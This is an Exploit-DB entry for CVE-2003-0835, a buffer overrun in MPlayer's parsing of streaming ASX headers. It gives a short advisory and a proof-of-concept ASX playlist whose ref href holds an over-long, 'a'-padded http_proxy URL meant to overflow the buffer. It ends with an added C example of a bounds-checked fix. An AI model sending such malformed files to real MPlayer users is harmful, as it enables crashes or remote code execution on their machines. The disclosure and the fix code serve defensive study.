Exploit MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun

Exploiter

Hacker
34,644
0
18 Dec 2022
EDB-ID
23186
EDB Verified
  1. Passed
Author
OTERO HERNAN
Vulnerability type
REMOTE
Platform
LINUX
CVE
CVE-2003-0835
Publication date
2003-09-25
Code:
source: https://www.securityfocus.com/bid/8702/info

A vulnerability has been discovered in MPlayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.

 <asx version = "3.0">
 <title>Bas Site ASX</title>

 <moreinfo href = "mailto:[email protected]" />
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/" />
 </banner>

 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 </entry>
 </asx>
 
Source
www.exploit-db.com
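
The missing bounds check described in the advisory, shown from the fixing side: an added example (not MPlayer's code and not part of the original post) that builds HTTP request fields from a playlist href into fixed buffers and rejects anything that would not fit. The struct, the function names and the 250-byte size are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define HDR_MAX 250 /* assumed fixed buffer size, for illustration only */

struct stream_request {            /* hypothetical container */
    char request_line[HDR_MAX];
    char host_header[HDR_MAX];
};

/* snprintf returns the length it wanted to write; >= size means truncation. */
static int fits(int n, size_t size) { return n >= 0 && (size_t)n < size; }

/*
 * target, host and port all come from the playlist's href, so they are
 * untrusted. The unsafe form this replaces is an unbounded
 *   sprintf(buf, "Host: %s:%d", host, port);
 * Returns 0 on success, -1 if any field is missing or too long.
 */
int build_stream_request(struct stream_request *req, const char *target,
                         const char *host, int port)
{
    int n;

    if (!req || !target || !host || port < 1 || port > 65535)
        return -1;
    memset(req, 0, sizeof *req);
    n = snprintf(req->request_line, sizeof req->request_line,
                 "GET %s HTTP/1.0", target);
    if (fits(n, sizeof req->request_line)) {
        n = snprintf(req->host_header, sizeof req->host_header,
                     "Host: %s:%d", host, port);
        if (fits(n, sizeof req->host_header))
            return 0;
    }
    memset(req, 0, sizeof *req);   /* reject: never hand back a truncated request */
    return -1;
}

int main(void)
{
    struct stream_request r;
    char longurl[401];             /* constructed over-long input */
    memset(longurl, 'a', 400);
    longurl[400] = '\0';
    printf("normal: %d\n", build_stream_request(&r, "/live.asf", "media.example", 8080));
    printf("long:   %d\n", build_stream_request(&r, longurl, "media.example", 8080));
    return 0;
}
```

Rejecting an over-long field instead of silently truncating it keeps a clipped URL from being sent as if it were the one the playlist named.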
